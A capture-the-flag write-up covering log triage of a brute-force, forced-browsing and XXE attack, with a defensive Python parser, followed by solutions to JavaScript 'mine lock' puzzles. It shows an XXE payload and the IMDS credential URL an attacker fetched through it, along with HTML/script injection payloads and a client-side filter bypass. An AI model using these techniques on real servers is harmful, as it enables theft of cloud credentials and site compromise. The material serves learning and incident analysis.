
The next attack is forced browsing where the naughty one is guessing URLs. What's the first successful URL path in this attack?
In the txt file, we look for the run of 404s coming from the bad IP and find the first 2xx success right after it:
The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?
There are a couple of XXE attempts (and technically file:///etc/passwd can also be considered a URI), but the first successful attacker-supplied URI fetched through that XXE/SSRF is:

http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
which grabs the EC2 instance's IMDS credentials (note that with IMDSv2 enforced this wouldn't have worked: IMDSv2 requires a session token obtained via a PUT request with a custom header first, which a blind XXE GET cannot supply).
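The three questions above are the same triage every time: which source is hammering the login page, where its URL guessing first succeeded, and what the server was forced to fetch. The block below is an added example, not Alabaster's artifacts or the page's own filters: it parses Apache combined-format lines, picks the brute-force source by POST count, finds the first 2xx after a run of 404s from that IP, and extracts SYSTEM entity URIs from an XXE body, flagging the IMDS address. The log lines and XML body are constructed (documentation IPs, made-up paths); the real log and the real attacker IP are not reproduced here.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed Apache combined-format lines (documentation IPs), not Alabaster's real log.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Oct/2022:16:01:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "python-requests/2.28"
198.51.100.7 - - [05/Oct/2022:16:01:03 +0000] "GET /login.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Oct/2022:16:02:00 +0000] "POST /login.html HTTP/1.1" 200 300 "-" "python-requests/2.28"
203.0.113.5 - - [05/Oct/2022:16:02:01 +0000] "POST /login.html HTTP/1.1" 200 300 "-" "python-requests/2.28"
203.0.113.5 - - [05/Oct/2022:16:02:02 +0000] "POST /login.html HTTP/1.1" 200 300 "-" "python-requests/2.28"
198.51.100.7 - - [05/Oct/2022:16:02:05 +0000] "POST /login.html HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Oct/2022:16:05:00 +0000] "GET /admin HTTP/1.1" 404 196 "-" "python-requests/2.28"
203.0.113.5 - - [05/Oct/2022:16:05:01 +0000] "GET /backup HTTP/1.1" 404 196 "-" "python-requests/2.28"
203.0.113.5 - - [05/Oct/2022:16:05:02 +0000] "GET /config HTTP/1.1" 404 196 "-" "python-requests/2.28"
203.0.113.5 - - [05/Oct/2022:16:05:03 +0000] "GET /dev-notes HTTP/1.1" 200 845 "-" "python-requests/2.28"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def parse_log(text):
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, ts, method, path, status, size = m.groups()
            entries.append({"ip": ip, "ts": ts, "method": method, "path": path, "status": int(status)})
    return entries


def brute_force_ip(entries, path="/login.html", threshold=3):
    """IP with the most POSTs to the login page, if it crosses the threshold."""
    counts = Counter(e["ip"] for e in entries if e["method"] == "POST" and e["path"] == path)
    if not counts:
        return None
    ip, n = counts.most_common(1)[0]
    return ip if n >= threshold else None


def first_forced_browsing_hit(entries, ip, min_misses=3):
    """First 2xx path the attacker reached after a run of 404s (URL guessing)."""
    misses = 0
    for e in entries:
        if e["ip"] != ip:
            continue
        if e["status"] == 404:
            misses += 1
        elif misses >= min_misses and 200 <= e["status"] < 300:
            return e["path"]
        else:
            misses = 0
    return None


ENTITY_RE = re.compile(r"<!ENTITY\s+\w+\s+SYSTEM\s+['\"]([^'\"]+)['\"]", re.IGNORECASE)
IMDS_HOSTS = {"169.254.169.254", "fd00:ec2::254", "metadata.google.internal"}


def xxe_system_uris(xml_body):
    """External entities the server would be forced to fetch (XXE turned SSRF)."""
    return ENTITY_RE.findall(xml_body)


def is_imds(uri):
    host = (urlparse(uri).hostname or "").strip("[]")
    return host in IMDS_HOSTS


# Constructed XXE request body, not the attacker's real one.
SAMPLE_XXE = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<product><id>&xxe;</id></product>"""


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    bad = brute_force_ip(entries)
    print("brute-force source:", bad)
    print("first forced-browsing hit:", first_forced_browsing_hit(entries, bad))
    for uri in xxe_system_uris(SAMPLE_XXE):
        print("XXE fetch:", uri, "(IMDS)" if is_imds(uri) else "")
```

The access log never contains POST bodies, which is why the first username and the XXE payload have to come from the pcap; xxe_system_uris() is meant to run over the request bodies you pull out of Wireshark.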
Boria mine locks
We're faced with locks implemented in JS.
We open the dev console:

First set of chars is in an html comment:
@&@&&W&&W&&&&
Second lock has the following comment:

So we understand we probably need to perform some kind of injection.
We try to draw the line by injecting an SVG and playing with the width and coordinates to connect both edges:
<svg height="210" width="500">
<line x1="0" y1="70" x2="250" y2="170" stroke="white" stroke-width="5" />
</svg>

The next box has the following html comment:
TODO: FILTER OUT JAVASCRIPT FROM USER INPUT
So we understand that we need to inject JS; maybe we can create the same SVG payload as above through JS.
Lock 3 also has the following CSP applied to it:

I used the following SO post as a base: https://stackoverflow.com/questions/20539196/creating-svg-elements-dynamically-with-javascript-inside-html
Setting the background style to blue works:
<script>document.body.style.color="blue"; document.body.style.backgroundColor = "blue"; </script>
<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>
<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>
<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>
For the next one we see a sanitizeInput method:

We check the sanitizeInput() code:
<script>
  const sanitizeInput = () => {
    const input = document.querySelector('.inputTxt');
    const content = input.value;
    // Each regex lacks the g flag, so only the FIRST occurrence of each character is stripped
    input.value = content
      .replace(/"/, '')
      .replace(/'/, '')
      .replace(/</, '')
      .replace(/>/, '');
  }
</script>
So we can't use ", ', < or >. Or rather: each replace() here uses a non-global regex, so only the first occurrence of each character is stripped, and since the filter runs client-side we can simply remove sanitizeInput() from the HTML before submitting.
For pin4 I used the below but had to disable the sanitizeInput() function before submission:
<script>document.body.style.backgroundImage = 'linear-gradient(to top,white 0%,white 70%,blue 70%,blue 100%)';</script><h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>
For pin5 I used:
<script>document.body.style.color="blue"; document.body.style.lineHeight = "0.90em";</script>
<font size="6"><br><br><br><br>         &&&&</font><br><font size="6">      &&W</font><br><font size="7"> &&W</font><font color="blue"size="5">     &&&&</font><br><font size="6"> @</font><font color="blue" size="6">     &&W</font><br><font size="8">&</font><font color="blue" size="6">   &&W</font><br><font size="8">@</font><font color="blue" size="7"> @</font><br><font color="blue" size="6">   &</font><br><font color="blue" size="6">  @</font>